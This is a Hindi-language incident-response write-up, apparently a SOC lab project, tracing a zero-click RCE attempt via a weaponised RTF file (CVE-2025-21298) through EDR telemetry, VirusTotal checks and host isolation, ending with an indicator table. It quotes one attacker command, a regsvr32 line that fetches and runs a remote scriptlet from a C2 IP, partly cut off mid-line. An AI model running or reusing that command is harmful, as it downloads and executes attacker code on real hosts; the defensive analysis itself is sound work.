
गंभीर-स्तर के Zero-Click RCE शोषण (CVE-2025-21298) की तकनीकी जांच और होस्ट नियंत्रण, EDR टेलीमेट्री और स्थिर मैलवेयर विश्लेषण का उपयोग करके।
यह परियोजना एक क्रिटिकल-गंभीरता वाले ज़ीरो-क्लिक रिमोट कोड एक्ज़ीक्यूशन (RCE) प्रयास के अंत-से-अंत जांच और रोकथाम का दस्तावेजीकरण करती है। EDR टेलीमेट्री और थ्रेट इंटेलिजेंस का उपयोग करते हुए, मैंने एक "Living off the Land" (LotL) हमले की पहचान की, जिसने स्वचालित सुरक्षा उपायों को बायपास कर दिया और कमांड-एंड-कंट्रोल (C2) संचार स्थापित किया।
मैंने इवेंट ID 314: Windows OLE ज़ीरो-क्लिक RCE डिटेक्शन की पहचान की। प्रारंभिक टेलीमेट्री से पता चला कि दुर्भावनापूर्ण फ़ाइल mail.rtf को परिधि सुरक्षा द्वारा अनुमत किया गया था, जो वर्कस्टेशन 'Austin' पर एक सक्रिय समझौते का संकेत देता है।

मैंने VirusTotal पर फ़ाइल हैश की प्रतिष्ठा जांच की। परिणामों ने 25/55 डिटेक्शन दर की पुष्टि की, विशेष रूप से फ़ाइल को CVE-2025-21298 का उपयोग करने वाले हथियारबंद RTF के रूप में पहचाना। यह भेद्यता विंडोज़ प्रीव्यू पेन के माध्यम से बिना उपयोगकर्ता इंटरैक्शन के रिमोट कोड निष्पादन की अनुमति देती है।

मैंने पोस्ट-एक्सप्लॉइटेशन व्यवहार की पहचान करने के लिए होस्ट 'Austin' के EDR टर्मिनल इतिहास की ओर रुख किया। मुझे एक दुर्भावनापूर्ण "Living off the Land" (LotL) निष्पादन मिला:
regsvr32.exe /s /u /i:http://84.38.130.118/...regsvr32.exe) का उपयोग करके एक दूरस्थ सर्वर से दुर्भावनापूर्ण स्क्रिप्ट-लेट प्राप्त किया, जिससे मानक एप्लिकेशन व्हाइटलिस्टिंग और पारंपरिक AV सिग्नेचर को बायपास किया गया।

NIST घटना प्रतिक्रिया ढांचे का पालन करते हुए, तत्काल रोकथाम को प्राथमिकता दी गई। मैंने प्रभावित होस्ट पर नेटवर्क आइसोलेशन निष्पादित किया, ताकि C2 संचार समाप्त हो सके और कॉर्पोरेट नेटवर्क के भीतर पार्श्व संचलन को रोका जा सके।

इस घटना को ट्रू पॉज़िटिव के रूप में बंद किया गया। मैंने भविष्य की घटनाओं को रोकने के लिए थ्रेट इंटेलिजेंस और फ़ायरवॉल टीमों के लिए हमलावर का IP (84.38.130.118) और फोरेंसिक साक्ष्य दर्ज किए।

| प्रकार | मान |
|---|
| C2 IP पता | 84.38.130.118 |
| फ़ाइल हैश (SHA256) | df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 |
| भेद्यता | CVE-2025-21298 |
| MITRE ATT&CK | T1218.010 - Signed Binary Proxy Execution: Regsvr32 |